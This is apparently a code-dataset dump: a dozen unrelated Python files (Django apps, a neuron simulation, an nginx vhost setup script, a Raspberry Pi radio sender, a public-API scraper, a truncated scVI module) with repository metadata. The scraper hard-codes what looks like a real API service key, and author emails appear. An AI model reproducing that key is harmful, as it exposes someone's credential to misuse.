x={'images': mnist.test.images}, y=mnist.test.labels,
batch_size=batch_size, shuffle=False)
# Use the Estimator 'evaluate' method
e = model.evaluate(input_fn)
print("Testing Accuracy:", e['accuracy'])
|
[
"chk0125@126.com"
] |
chk0125@126.com
|
2c6659fa00d6ac07197690b564d7aac721369d86
|
a2fb6bda878d79e4b31d8b3d76d9a2a40dc604ef
|
/backend/notes/serializers.py
|
6388c086796a97dc998df942375fbc474461a86c
|
[] |
no_license
|
Aruta1ru/budgeter
|
b3224b68601df29e952d34630d2c5891b3883291
|
672232d1be853a948171825d7b380d8d2e131f94
|
refs/heads/master
| 2023-03-27T04:01:09.424337
| 2021-03-12T12:27:54
| 2021-03-12T12:27:54
| 346,987,850
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 319
|
py
|
from rest_framework import serializers
from .models import Category, Note
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = '__all__'
class NoteSerializer(serializers.ModelSerializer):
class Meta:
model = Note
fields = '__all__'
|
[
"djgraf95@gmail.com"
] |
djgraf95@gmail.com
|
85a9386cf8f783bd013959909bab9d7614a1d07a
|
78aa3c2e1bf95fa1e440f40c0a27273d5f1f6284
|
/com.kuta.python.basedata/Tuple.py
|
8bc3b8d619a73ec7ac5df3d0d6ecdd51184875d3
|
[] |
no_license
|
kutala/HelloPython
|
c98b2fe1be67b5bbd08a0ada08b875f7ce2075dd
|
d685a27956aecd01839b05523fe1f2b8b6891296
|
refs/heads/master
| 2021-01-01T15:30:14.962842
| 2016-11-29T09:38:39
| 2016-11-29T09:38:39
| 40,281,912
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
# -*- coding: UTF-8 -*-
tuple = ( 'abcd', 786 , 2.23, 'john', 70.2 )
tinytuple = (123, 'john')
print tuple # 输出完整元组
print tuple[0] # 输出元组的第一个元素
print tuple[1:3] # 输出第二个至第三个的元素
print tuple[2:] # 输出从第三个开始至列表末尾的所有元素
print tinytuple * 2 # 输出元组两次
print tuple + tinytuple # 打印组合的元组
|
[
"80011355@qq.com"
] |
80011355@qq.com
|
407de71cbc79d7d56529dc074e6ec44af29d49ae
|
d5a7202c1cd60ab487c4f5367bc9a4bfa3de3440
|
/TestBed/src/brain/examples/misc/ring.py
|
1aa39dac35d163116bde320f633d1b2500d7e86b
|
[] |
no_license
|
thanhmaikmt/pjl
|
40b202fa8bd513f2103bc82f3b770a1fcdcb4141
|
f2fb00f297c63a5211198cd47edce0aacfba6c11
|
refs/heads/master
| 2021-01-19T09:48:51.301034
| 2014-04-04T18:28:59
| 2014-04-04T18:28:59
| 40,103,495
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
"""
A ring of integrate-and-fire neurons.
"""
from brian import *
tau = 10 * ms
v0 = 11 * mV
N = 20
w = 1 * mV
ring = NeuronGroup(N, model='dv/dt=(v0-v)/tau : volt', threshold=10 * mV, reset=0 * mV)
W = Connection(ring, ring, 'v')
for i in range(N):
W[i, (i + 1) % N] = w
ring.v = rand(N) * 10 * mV
S = SpikeMonitor(ring)
run(300 * ms)
raster_plot(S)
show()
|
[
"pauljohnleonard@fadc175c-ebca-11de-a75d-bbceaaa5444e"
] |
pauljohnleonard@fadc175c-ebca-11de-a75d-bbceaaa5444e
|
5120c0f875dbadae51d4066d3e76b655e03280e0
|
7c222e4dd6e434ee6a489c0e518744245735cce8
|
/hackerspace_site/apps/blog/forms.py
|
2858af5dd2f46bae7db8f12edf12ec88d952961e
|
[] |
no_license
|
HackerSpace-PESU/hackerspace.pes.edu
|
ad9183eb4421d9c8534d98dbfdcf80069f0b58b3
|
0a45bc9c1ed58eba83d3c5b04f054cd36c7e9fc7
|
refs/heads/master
| 2023-05-14T00:34:49.590888
| 2021-05-27T09:51:56
| 2021-05-27T09:51:56
| 322,908,540
| 9
| 4
| null | 2021-05-27T09:51:57
| 2020-12-19T18:07:54
|
HTML
|
UTF-8
|
Python
| false
| false
| 373
|
py
|
from django.forms import ModelChoiceField, ModelForm
from martor.fields import MartorFormField
from .models import Author, Blog
class NewBlogForm(ModelForm):
author = ModelChoiceField(
queryset=Author.objects.all(),
)
blog_in_markdown = MartorFormField()
class Meta:
model = Blog
fields = ["author", "title", "blog_in_markdown"]
|
[
"noreply@github.com"
] |
HackerSpace-PESU.noreply@github.com
|
69b82c6e7c1b89da41ffdaf1099f828d16af52f8
|
3f3091436da6e2032949b3c474a663fee188f5d5
|
/webempresa/services/migrations/0004_project.py
|
ce1253050d026a35927123cc36077ac8f0560332
|
[] |
no_license
|
juanantoniotora/Curso_DJango2_WebCorporativa_Ejemplo
|
b9993bc740ee2b47c034938870841d5ee35152e7
|
975acbc0a601206edeb6235588e710c3698a192d
|
refs/heads/master
| 2022-12-07T07:01:50.230314
| 2019-10-10T19:26:00
| 2019-10-10T19:26:00
| 214,251,337
| 0
| 0
| null | 2022-11-22T02:24:23
| 2019-10-10T18:02:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,192
|
py
|
# Generated by Django 2.2.4 on 2019-10-05 18:44
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('services', '0003_delete_project'),
]
operations = [
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='Título')),
('subtitle', models.CharField(max_length=200, verbose_name='Sub-título')),
('content', models.TextField(default='', verbose_name='Contenido')),
('image', models.ImageField(upload_to='', verbose_name='Imagen')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Creado')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Actualizado')),
],
options={
'verbose_name': 'modelo_Servicio',
'verbose_name_plural': 'tabla_Servicios',
'ordering': ['-created'],
},
),
]
|
[
"juanantonio.tora@gmail.com"
] |
juanantonio.tora@gmail.com
|
8e4033741ac16a69170a9bfaf0ba7158c207ddc2
|
d0cf8b68b68e33900544dc056566511428692b71
|
/tests/spoof/gs_feature_elision.py
|
c2aabeb4d4d1e9b78fab46632764e38d376bfe25
|
[
"MIT"
] |
permissive
|
ryanfb/OCRmyPDF
|
3f1547c164d3b74b5e6c003bb875e50c292b36a4
|
f6a4d8f1f808a1c963c85e498a773ef0439db5ed
|
refs/heads/master
| 2021-01-21T04:25:00.603736
| 2017-08-27T20:53:36
| 2017-08-27T20:53:36
| 101,911,301
| 1
| 0
| null | 2017-08-30T17:44:15
| 2017-08-30T17:44:15
| null |
UTF-8
|
Python
| false
| false
| 800
|
py
|
#!/usr/bin/env python3
# © 2016 James R. Barlow: github.com/jbarlow83
import sys
import os
from subprocess import check_call
"""Replicate one type of Ghostscript feature elision warning during
PDF/A creation."""
def real_ghostscript(argv):
gs_args = ['gs'] + argv[1:]
os.execvp("gs", gs_args)
return # Not reachable
elision_warning = """GPL Ghostscript 9.20: Setting Overprint Mode to 1
not permitted in PDF/A-2, overprint mode not set"""
def main():
if '--version' in sys.argv:
print('9.20')
print('SPOOFED: ' + os.path.basename(__filename__))
sys.exit(0)
gs_args = ['gs'] + sys.argv[1:]
check_call(gs_args)
if '-sDEVICE=pdfwrite' in sys.argv[1:]:
print(elision_warning)
sys.exit(0)
if __name__ == '__main__':
main()
|
[
"jim@purplerock.ca"
] |
jim@purplerock.ca
|
88f37dcfa3636c5a91c3546ae84c383167f931e2
|
5ec06dab1409d790496ce082dacb321392b32fe9
|
/clients/python-flask/generated/openapi_server/models/com_adobe_cq_social_commons_emailreply_impl_custom_email_client_provider_properties.py
|
4d9bc47c42da303a7c969c543512bee62080c310
|
[
"Apache-2.0"
] |
permissive
|
shinesolutions/swagger-aem-osgi
|
e9d2385f44bee70e5bbdc0d577e99a9f2525266f
|
c2f6e076971d2592c1cbd3f70695c679e807396b
|
refs/heads/master
| 2022-10-29T13:07:40.422092
| 2021-04-09T07:46:03
| 2021-04-09T07:46:03
| 190,217,155
| 3
| 3
|
Apache-2.0
| 2022-10-05T03:26:20
| 2019-06-04T14:23:28
| null |
UTF-8
|
Python
| false
| false
| 4,134
|
py
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server.models.config_node_property_array import ConfigNodePropertyArray # noqa: F401,E501
from openapi_server.models.config_node_property_integer import ConfigNodePropertyInteger # noqa: F401,E501
from openapi_server import util
class ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, priority_order: ConfigNodePropertyInteger=None, reply_email_patterns: ConfigNodePropertyArray=None): # noqa: E501
"""ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties - a model defined in OpenAPI
:param priority_order: The priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties. # noqa: E501
:type priority_order: ConfigNodePropertyInteger
:param reply_email_patterns: The reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties. # noqa: E501
:type reply_email_patterns: ConfigNodePropertyArray
"""
self.openapi_types = {
'priority_order': ConfigNodePropertyInteger,
'reply_email_patterns': ConfigNodePropertyArray
}
self.attribute_map = {
'priority_order': 'priorityOrder',
'reply_email_patterns': 'replyEmailPatterns'
}
self._priority_order = priority_order
self._reply_email_patterns = reply_email_patterns
@classmethod
def from_dict(cls, dikt) -> 'ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The comAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties. # noqa: E501
:rtype: ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties
"""
return util.deserialize_model(dikt, cls)
@property
def priority_order(self) -> ConfigNodePropertyInteger:
"""Gets the priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:return: The priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:rtype: ConfigNodePropertyInteger
"""
return self._priority_order
@priority_order.setter
def priority_order(self, priority_order: ConfigNodePropertyInteger):
"""Sets the priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:param priority_order: The priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:type priority_order: ConfigNodePropertyInteger
"""
self._priority_order = priority_order
@property
def reply_email_patterns(self) -> ConfigNodePropertyArray:
"""Gets the reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:return: The reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:rtype: ConfigNodePropertyArray
"""
return self._reply_email_patterns
@reply_email_patterns.setter
def reply_email_patterns(self, reply_email_patterns: ConfigNodePropertyArray):
"""Sets the reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:param reply_email_patterns: The reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:type reply_email_patterns: ConfigNodePropertyArray
"""
self._reply_email_patterns = reply_email_patterns
|
[
"cliffano@gmail.com"
] |
cliffano@gmail.com
|
125fd5dd7734d83661f29aaad97899bcd613ff7e
|
8b5225609f76dab9afb261654d27074c1ce24d03
|
/md_320_2.py
|
5effc01ceb3db4260a53eb402c8f3507ef17d65f
|
[] |
no_license
|
wlstjd2378/python4095
|
27a55db195380b82641cab7cba5fee3ed8aaff83
|
78f45ea30aa3dabd14d5422813092ba8c031c8e3
|
refs/heads/master
| 2020-05-30T17:49:50.405382
| 2019-06-03T03:18:58
| 2019-06-03T03:18:58
| 189,883,998
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,973
|
py
|
import requests
from bs4 import BeautifulSoup
import pandas as pd
url = 'http://apis.data.go.kr/B552061/jaywalking/getRestJaywalking'
queryParams = '?' + 'serviceKey=' + 'nBR6ds%2BFTLtKBfkc9qEKhBBGdZF09DnpkSRWSKTyxiHp%2BRVBtJbWjTQMqvvMb%2FVf0TGceYhCeGyvpHtJAhIlJA%3D%3D' \
+ '&searchYearCd=' + '2017' \
+ '&siDo=' + '26' \
+ '&guGun=' + '320' \
+ '&type=' + 'xml' \
+ '&numOfRows=' + '25' \
+ '&pageNo=' + '1'
url = url + queryParams
result = requests.get(url)
bs_obj = BeautifulSoup(result.content, "html.parser")
data1 = bs_obj.findAll('spot_nm') #다발지역명
data2 = bs_obj.findAll('occrrnc_cnt') #발생건수
data3 = bs_obj.findAll('dth_dnv_cnt') #사망자
data4 = bs_obj.findAll('caslt_cnt') #부상자
data5 = bs_obj.findAll('se_dnv_cnt') #중상자
data6 = bs_obj.findAll('sl_dnv_cnt') #경상자
# list_data = {'다발지역명':[],'발생건수':[],'사망자수':[],\
# '부상자수':[],'중상':[],'경상':[],\
# '시군구':['중구','서구','동구','영도구','부산진구','동래구','남구','북구','해운대구','사하구','금정구','강서구','연제구','수영구','사상구','기장군']}
data = {'시군구': [],'다발지역명':[],'발생건수':[],'사망자수':[],'부상자수':[],'중상':[],'경상':[]}
d1,d2,d3,d4,d5,d6,d7 = [],[],[],[],[],[],[]
for i in range(0,len(data1)):
d1.append(data1[i].get_text())
d2.append(data2[i].get_text())
d3.append(data3[i].get_text())
d4.append(data4[i].get_text())
d5.append(data5[i].get_text())
d6.append(data6[i].get_text())
d7.append('북구')
data['다발지역명'] = d1
data['발생건수'] = d2
data['사망자수'] = d3
data['부상자수'] = d4
data['중상'] = d5
data['경상'] = d6
data['시군구'] = d7
df_320_2 = pd.DataFrame(data, columns = ['시군구','다발지역명','발생건수','사망자수','부상자수','중상','경상'])
#print(df_320_2)
|
[
"noreply@github.com"
] |
wlstjd2378.noreply@github.com
|
83cef915c5831fa22780de720175e98cce80ccc3
|
3a4f14d6638bc0c12c129ed73c6c3543437203df
|
/src/morphforgeexamples/multicell_simulation/multicell_simulation010.py
|
4e246688646bd3831457507719b3611426692cef
|
[
"BSD-2-Clause"
] |
permissive
|
unidesigner/morphforge
|
ef04ccb3877f069a0feea72eb1b44c97930dac44
|
510cd86549b2c2fb19296da2d4408ed8091fb962
|
refs/heads/master
| 2021-01-15T22:34:28.795355
| 2012-04-05T08:55:12
| 2012-04-05T08:55:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51
|
py
|
"""[*] Two cells connected with an AMPA synapse"""
|
[
"mikehulluk@googlemail.com"
] |
mikehulluk@googlemail.com
|
f5901347ae2393fbd28a0397052a34725ea59268
|
a1333f0e6b594eda043922363734b0e9e7e65b0e
|
/Pi sender/sender.py
|
affb768b4876f887e32a097da8ba6ad0f6c1c4ab
|
[] |
no_license
|
Kartikkh/Communication-between-Rpi-and-arduino-
|
65cb1b50871b73c8fc33c7f8b9bb4c287db09d22
|
0e961b2ba408bf1171dc3ff798f255ab99d444b2
|
refs/heads/master
| 2021-01-19T14:53:37.537722
| 2017-04-13T19:01:47
| 2017-04-13T19:01:47
| 88,194,870
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,122
|
py
|
import RPi.GPIO as GPIO
from lib_nrf24 import NRF24
import time
import spidev
GPIO.setmode(GPIO.BCM)
pipes = [[0xE8 , 0xE8 , 0xF0 , 0xF0 , 0xE1] , [0xF0 ,0xF0, 0xF0, 0xF0, 0xE1]]
radio = NRF24(GPIO,spidev.SpiDev())
radio.begin(0,17)
radio.setPayloadSize(32)
radio.setChannel(0x76)
radio.setDataRate(NRF24.BR_1MBPS)
radio.setPALevel(NRF24.PA_MIN)
radio.setAutoAck(True)
radio.enableDynamicPayloads()
radio.enableAckPayload()
radio.openWritingPipe(pipes[0])
radio.openReadingPipe(1,pipes[1])
radio.printDetails()
message = "11"
while True:
start = time.time();
radio.write(message)
print("Sent message: {}".format(message))
radio.startListening()
while not radio.available(0):
time.sleep(1/100)
if time.time() - start > 2:
print("timeOut")
break
recievedMessage = []
radio.read(recievedMessage, radio.getDynamicPayloadSize())
print("Recieved : {}" .format(recievedMessage))
print("Translating string")
string = ''
print("our recieved message: {} ".format(string))
radio.stopListening()
time.sleep(2)
|
[
"khandelwal.kartik4gmail.comkhandelwal.kartik4gmail.com"
] |
khandelwal.kartik4gmail.comkhandelwal.kartik4gmail.com
|
a49e1855d4a2718fa0f9f0145c2892c9d810d1b8
|
6a8d994c73983de88a60ba8278ecb3f87ab98679
|
/BONJI_store/views.py
|
736d151984c759634778278d9ef5d1c5fef4550c
|
[] |
no_license
|
dberehovets/BONJI_store
|
5d12dd8c062c086b3b6ae1f6d53ce4458ecb3621
|
33701e028ed9b94a5604b663ba446a440e8e813d
|
refs/heads/master
| 2021-04-23T21:39:51.178910
| 2020-04-21T13:02:13
| 2020-04-21T13:02:13
| 250,011,659
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,241
|
py
|
from django.views.generic import TemplateView, ListView
from django.shortcuts import redirect, render
from django.http import HttpResponseRedirect
from django.core.paginator import Paginator
from accounts.forms import SubscriberForm
from accounts.models import Subscriber
from products.models import Product
from django.contrib import messages
from django.core.mail import send_mail
from random import shuffle
class HomePage(TemplateView):
template_name = 'index.html'
def post(self, request, *args, **kwargs):
form = SubscriberForm(request.POST)
if form.is_valid():
Subscriber.objects.get_or_create(**form.cleaned_data)
messages.add_message(request, messages.SUCCESS, "You are subscribed!")
return redirect('home')
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
products = list(Product.objects.all())
shuffle(products)
if len(products) >= 8:
products = products[:8]
context['products'] = products
return context
class ContactPage(TemplateView):
template_name = 'contact.html'
def post(self, request, *args, **kwargs):
# name = request.POST.get('name')
# last_name = request.POST.get('last_name')
# email = request.POST.get('email')
# subject = request.POST.get('subject') or "New message"
# message = name + " " + last_name + " wrote \n" + request.POST.get('message')
#
# send_mail(subject, message, email, ['dberehovets@gmail.com'])
messages.add_message(request, messages.SUCCESS, "Your email has been sent. Thank you!")
return redirect('contact')
def search(request):
if request.method == "POST":
req = request.POST.get('request')
if req == 'sale' or req == 'hot' or req == 'new':
products = Product.objects.filter(product_extra=req).order_by('-id')
else:
products = Product.objects.filter(name__contains=req).order_by('-id')
paginator = Paginator(products, 12)
return render(request, 'search_list.html', {'product_list': products, 'paginator': paginator})
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
|
[
"58703014+dberehovets@users.noreply.github.com"
] |
58703014+dberehovets@users.noreply.github.com
|
c5a2686d19b0f3755d88a674ad24192b5c02286a
|
19a3c90ce8873d8f9fa7498b64597ee6fe5b767b
|
/simplemes/uwip/apps.py
|
1db1524788524f91f0e65aafa0dfc46f57aabdcf
|
[
"MIT"
] |
permissive
|
saulshao/simplemes
|
5eff2730b95c0de1c9a51e70d9ebf1ebab59ff2c
|
fb317570666f776231c1ffd48c6114b9697e47f1
|
refs/heads/master
| 2020-07-26T13:00:46.494089
| 2020-03-12T08:26:42
| 2020-03-12T08:26:42
| 208,651,563
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 83
|
py
|
from django.apps import AppConfig
class UwipConfig(AppConfig):
name = 'uwip'
|
[
"saulshao@yahoo.com"
] |
saulshao@yahoo.com
|
b1a8761bb8817603f8a347b24bff02b3180b2855
|
2fc0ae670f7200a7ad936eb1e3c9d56b5ef879df
|
/create.py
|
8931526e88b73d1ab967c5b07648b2e2abae3857
|
[] |
no_license
|
alexlesan/python_automatization
|
0013c7051c94175bf17dc4ac6203db7e89f1db94
|
b6a3a4f9bd1b282dee54f5f6c783f5aa0d23dfa0
|
refs/heads/master
| 2020-09-11T06:53:54.108793
| 2019-11-15T18:24:03
| 2019-11-15T18:24:03
| 221,979,550
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,141
|
py
|
import os, errno, sys, config
import argparse
import subprocess
import time
#parser arguments
parser = argparse.ArgumentParser(description='Create new local project')
parser.add_argument('--name', type=str, help='Name of the project')
parser.add_argument('--open', type=int, nargs='?', const=1, help='Open the editor with the project')
# make the directory of the project
def make_dir(domain):
try:
path_dir = config.PATH+domain
os.mkdir(path_dir, config.ACCESS_RIGHTS)
os.chmod(path_dir, config.ACCESS_RIGHTS)
print ("Successfully created the directory: "+path_dir)
make_nginx_file(domain)
except OSError as e:
str_error = e.strerror
if e.errno == errno.EEXIST:
str_error = "\tThe directory already exists."
str = "\tCoudn't create the directory: "+path_dir+"."
print(str)
print(str_error)
# make the nginx site-availables file and link to enabled-sites
def make_nginx_file(domain):
try:
filename_loc = domain+".loc"
full_path = config.NGINX_SITE_AVAILABLES_PATH+filename_loc
site_enabled_path = config.NGINX_SITE_ENABLED_PATH+filename_loc
#replace in file template and copy to nginx
temp_file = open(config.TEMPLATE_VH, 'r')
dest_file = open(full_path, 'w')
file_lines = temp_file.readlines()
for line in file_lines:
res = line.replace("{PROJECT_NAME}", domain)
dest_file.write(res.replace("{SERVER_NAME}", filename_loc))
temp_file.close()
dest_file.close()
#create the symlink to site-enabled
os.symlink(full_path, site_enabled_path)
print("Symlink was created.")
#update the hosts file
update_hosts_file(domain)
#restart the nginx server
restart_nginx()
except OSError as e:
print (e.strerror)
# update the hosts file with new virutal host url
def update_hosts_file(domain):
try:
str_line = "\n127.0.0.1\t"+domain.lower()+".loc"
with open(config.HOSTS_FILE_PATH, 'a') as f:
f.write(str_line)
print("Hosts file was updated.")
except OSError as e:
print(e.strerror)
# restart the engin server after modifications
def restart_nginx():
try:
#restart the nginx
command_str = "sudo systemctl restart nginx"
os.system(command_str)
print("The nginx server was restarted successfully")
except:
print("Coudn't restart the nginx server")
# check and run the command
if __name__ == '__main__':
param = vars(parser.parse_args())
domain = param['name'].lower()
open_editor = param['open']
if domain != '':
make_dir(domain)
if open_editor == 1:
# open the project in atom editor
print("\t Opening the Atom editor...")
# atom_cmd = ["atom", config.PATH+domain]
# subprocess.Popen(atom_cmd).wait()
os.system('atom '+config.PATH+domain)
time.sleep(1)
print("\t The process was finished.")
else:
print("No domain name was provided.")
|
[
"alex.lesan@gmail.com"
] |
alex.lesan@gmail.com
|
4a4d17d3ae6047f3dc96cac26f38a98d54b2c02c
|
ad32c2f9c37158540c6f221794a365b65bfbb02c
|
/lib/S02_onde_progressive.py
|
947b364f2de742fec5dfa689d3d8813b5634ee61
|
[] |
no_license
|
jjfPCSI1/py4phys
|
27bff9cd79e51b88dd926f552bda8c5d623585c0
|
47f9518d9b56e46a873bec9834c98c005a2c5017
|
refs/heads/master
| 2022-08-09T05:14:14.761789
| 2022-08-02T19:34:30
| 2022-08-02T19:34:30
| 22,642,385
| 27
| 18
| null | 2022-02-18T08:03:07
| 2014-08-05T12:21:56
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,016
|
py
|
# coding: utf8
# Sauf mention explicite du contraire par la suite, ce travail a été fait par
# Jean-Julien Fleck, professeur de physique/IPT en PCSI1 au lycée Kléber.
# Vous êtes libres de le réutiliser et de le modifier selon vos besoins.
'''
Illustration du phénomène de propagation vers la droite d'une onde de forme
quelconque à la fois au cours du temps dans un profil spatial, et spatialement
dans un profil temporel.
'''
import numpy as np # Pour np.linspace, np.exp et np.cos
import matplotlib.pyplot as plt # Pour les dessins
def f(u,k=10):
'''Le profil de l'onde à propager: une gaussienne multipliée par un cosinus.'''
return np.exp(-3*u**2) * np.cos(k*u-5)
nb_points = 1000 # Le nombre de points d'échantillonnage du graphe
nb_courbes = 3 # Le nombre de courbes à représenter
# Tout d'abord la visualisation spatiale
x = np.linspace(-2,2,nb_points) # Echantillonnage en position
t = np.linspace(0,5,nb_courbes) # On regarde le profil à différents temps
c = 0.2 # Vitesse de propagation de l'onde
for ti in t:
fi = f(x-c*ti) # Echantillonnage du profil pour les différents x
plt.plot(x,fi,label='$t={}$'.format(round(ti,1))) # Affichage
# La cosmétique
plt.title('Profil spatial pour differents temps')
plt.xlabel('Position $x$')
plt.ylabel("Profil de l'onde")
plt.legend()
plt.savefig('PNG/S02_onde_progressive_spatial.png')
plt.clf()
# Tout d'abord la visualisation spatiale
t = np.linspace(0,10,nb_points) # Echantillonnage en temps
x = np.linspace(0,0.6,nb_courbes) # On regarde le profil à différentes positions
c = 0.2 # Vitesse de propagation de l'onde
for xi in x:
fi = f(xi-c*t) # Echantillonnage du profil pour les différents t
plt.plot(t,fi,label='$x={}$'.format(round(xi,1))) # Affichage
# La cosmétique
plt.title('Profil temporel pour differente positions')
plt.xlabel('Temps $t$')
plt.ylabel("Profil de l'onde")
plt.legend()
plt.savefig('PNG/S02_onde_progressive_temporel.png')
plt.clf()
|
[
"jeanjulien.fleck@gmail.com"
] |
jeanjulien.fleck@gmail.com
|
75398d6fb05ae07bc21020d5bd77276beee18c18
|
66a82eb045bd14d45163a76c61ad2bfe2f9d03ab
|
/EjBasicosPython/Ej9_Diccionario.py
|
5146a9bd79f6a9db005a42464bdefde5a83d80a1
|
[
"MIT"
] |
permissive
|
alexiscv/DAM2_SGE
|
c53da5fdeb0a7bcc69bf3f1f2aa929e03a62a04c
|
aa7371262e869becca51e5352a0e46c16a997f58
|
refs/heads/master
| 2021-01-24T12:23:26.714885
| 2018-02-28T00:12:10
| 2018-02-28T00:12:10
| 123,134,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,110
|
py
|
# Creamos un diccionario
d = {}
# Mostrar menú
def menu() :
print("## MENÚ ##")
print("1) Añadir término")
print("2) Buscar definición")
print("0) Salir")
print("Que desea hacer:")
opcion = int(input())
return opcion;
# Mostramos la primera vez el menú
# y recogemos la opción seleccionada
op = menu()
# Ejecutamos hasta que queramos salir
while( op != 0 ):
# Ejecutamos la acción seleccionada
# Añadir
if( op == 1):
# Preguntamos por los datos del termino
print("Nombre del termino:")
termino = input()
print("Definición:")
definicion = input()
# Añadimos al diccionario
d[termino] = definicion
# Buscar
elif( op == 2):
# Preguntamos por el término
print("Nombre del termino:")
termino = input()
# Retornamos la Definición
print(d[termino])
else:
print("ERROR: Opción no reconocida");
# La acción ya se ha ejecutado
# Volvemos a mostrar el menú
op = menu()
# Cuando salgamos, mostramos todo el diccionario
print(d)
|
[
"hogo.jp@gmail.com"
] |
hogo.jp@gmail.com
|
0d35174dbee1362ac380bf5e44b079d867cc538d
|
33ccdaa6293162511c4ad74284f69b2bd6451044
|
/pyscutils/scvi_utils.py
|
047d3b60725774029d64a5f1cef0c6622d33e66e
|
[
"BSD-3-Clause"
] |
permissive
|
saketkc/pyscutils
|
f3f9199f0c2e3954dc79369b99f4612acd9cf0c2
|
282a6cc707deaee80ab8ebc5596d25b9e21d6ffb
|
refs/heads/master
| 2023-01-23T02:26:28.599751
| 2020-11-19T00:31:07
| 2020-11-19T00:31:07
| 297,775,606
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 50,655
|
py
|
import os
import warnings
warnings.simplefilter("ignore")
import shutil
from typing import Dict, Iterable, List, Tuple
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import proplot
import scanpy as sc
import scvi
import seaborn as sns
import torch
import torch.nn as nn
from adjustText import adjust_text
from scvi import set_seed
from scvi.dataset import AnnDatasetFromAnnData
from scvi.models.utils import one_hot
from scvi.inference import UnsupervisedTrainer, load_posterior
from scvi.models.distributions import (
NegativeBinomial,
Poisson,
ZeroInflatedNegativeBinomial,
)
from scvi.models.log_likelihood import log_nb_positive, log_zinb_positive
from scvi.models.modules import DecoderSCVI, Encoder, FCLayers, LinearDecoderSCVI
from scvi.models.vae import LDVAE, VAE
from torch.distributions import Normal
from torch.distributions import kl_divergence as kl
## Modifications from scVI code marked with '################ ===>'
def compute_scvi_latent(
adata: sc.AnnData,
n_latent: int = 50,
n_encoder: int = 1,
n_epochs: int = 200,
lr: float = 1e-3,
use_batches: bool = False,
use_cuda: bool = False,
linear: bool = False,
cell_offset: str = "none",
gene_offset: str = "none",
ldvae_bias: bool = False,
reconstruction_loss: str = "zinb",
hvg_genes=None,
) -> Tuple[scvi.inference.Posterior, np.ndarray]:
"""Train and return a scVI model and sample a latent space
:param adata: sc.AnnData object non-normalized
:param n_latent: dimension of the latent space
:param n_epochs: number of training epochs
:param lr: learning rate
:param use_batches
:param use_cuda
:return: (scvi.Posterior, latent_space)
"""
# Convert easily to scvi dataset
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
# print(scviDataset.X.shape)
# print(scviDataset.X[:10,:5])
# print(scviDataset.raw.X.shape)
if isinstance(scviDataset.X, np.ndarray):
X = scviDataset.X
else:
X = scviDataset.X.toarray()
gene_mean = torch.mean(
torch.from_numpy(X).float().to(torch.cuda.current_device()), dim=1
)
cell_mean = torch.mean(
torch.from_numpy(X).float().to(torch.cuda.current_device()), dim=0
)
# Train a model
if not linear:
vae = VAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
reconstruction_loss=reconstruction_loss,
)
else:
vae = LDVAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers_encoder=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
bias=ldvae_bias,
reconstruction_loss=reconstruction_loss,
)
trainer = UnsupervisedTrainer(vae, scviDataset, train_size=1.0, use_cuda=use_cuda)
trainer.train(n_epochs=n_epochs, lr=lr)
# Extract latent space
posterior = trainer.create_posterior(
